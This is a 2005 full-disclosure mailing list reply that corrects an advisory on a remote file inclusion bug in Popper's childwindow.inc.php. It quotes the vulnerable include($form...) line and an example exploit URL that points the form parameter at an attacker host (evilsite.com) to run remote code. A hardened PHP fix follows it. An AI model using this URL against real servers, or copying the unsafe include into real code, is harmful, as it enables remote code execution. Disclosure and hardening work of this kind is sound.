
List:       full-disclosure
Subject:    [Full-disclosure] Re: LSS.hr false positives. (correction)
From:       Leon Juranic <ljuranic () lss ! hr>
Date:       2005-06-05 23:23:57
Message-ID: 20050605232357.CC5BC42F3D () maja ! zesoi ! fer ! hr


Hi b0iler,


There is a problem with the original advisory on the security.lss.hr site. The vulnerable 
PHP line itself is presented as an HTML tag, so it isn't visible within the browser. 
That's why the rest of the advisory doesn't make any sense.

Here it is:
--------------
..
<?php
		if(file_exists($form.".toolbar.inc.php")) {
			include($form.".toolbar.inc.php");
		}
?>
..
..
<?php include($form.".form.inc.php");?>    <- HERE IT IS
..
--------------


I apologize for that mistake, we will fix that in a few hours. 



> b0iler[at]r00thell.org:
>
>>Popper is vulnerable to a remote code inclusion bug in childwindow.inc.php script that can be
>>abused to execute arbitrary code.
>>Vulnerable code in childwindow.inc.php:
>>
>>-----
>>...
>>    if(file_exists($form.".toolbar.inc.php")) {
>>        include($form.".toolbar.inc.php");
>>    }
>>?>
>
>file_exists() only works on local files, not even with allow_url_fopen on does it work.  Even
>if the file_exists() check was not there your description of how to exploit it is incorrect:
>
>>To exploit this vulnerability, an attacker has to put a script like test.form.inc.php on
>>www.evilsite.com HTTP server, and call a URL like this:
>>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
>
>they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  It's quite
>obvious you did not even bother testing this before issuing the advisory.
>


Regards,
---------------------------------------
Leon Juranic, LSS Security 
http://security.lss.hr 

"Born under the lucky star magical, 
but on this world generally tragical". 
                                - Djole 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
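A hardened replacement for the include pattern quoted above, added here as an example; it is not Popper's code nor part of this thread. FORM_DIR and ALLOWED_FORMS are assumed names for the include directory and the set of shipped form names.

```php
<?php
// Added example, not Popper's own code. Hardened version of the
// include($form.".form.inc.php") pattern: the name must be a plain
// identifier, must be on a fixed allowlist, and the resolved path must
// stay inside FORM_DIR, so neither a URL nor a traversal string reaches include().
const FORM_DIR      = __DIR__ . '/forms';                 // assumed location
const ALLOWED_FORMS = ['compose', 'reply', 'forward'];    // assumed allowlist

function resolve_form_file(string $form, string $suffix): ?string
{
    // Rejects "/", ":", "..", NUL and anything else that is not an identifier.
    if (!preg_match('/^[a-z][a-z0-9_]{0,31}$/', $form)) {
        return null;
    }
    // Only names we actually ship may be included.
    if (!in_array($form, ALLOWED_FORMS, true)) {
        return null;
    }
    $base = realpath(FORM_DIR);
    $path = realpath(FORM_DIR . '/' . $form . $suffix);
    if ($base === false || $path === false) {
        return null;
    }
    // Both paths are canonical now; the file must sit directly under FORM_DIR.
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

function hardened_include(string $form): void
{
    // The toolbar part stays optional, as in the original; the form part is required.
    $toolbar = resolve_form_file($form, '.toolbar.inc.php');
    if ($toolbar !== null) {
        include $toolbar;
    }
    $file = resolve_form_file($form, '.form.inc.php');
    if ($file === null) {
        http_response_code(400);
        exit('invalid form');
    }
    include $file;
}
```

Disabling allow_url_include (and allow_url_fopen where nothing needs it) in php.ini is a second, independent layer; the allowlist above removes the bug even where that setting is on.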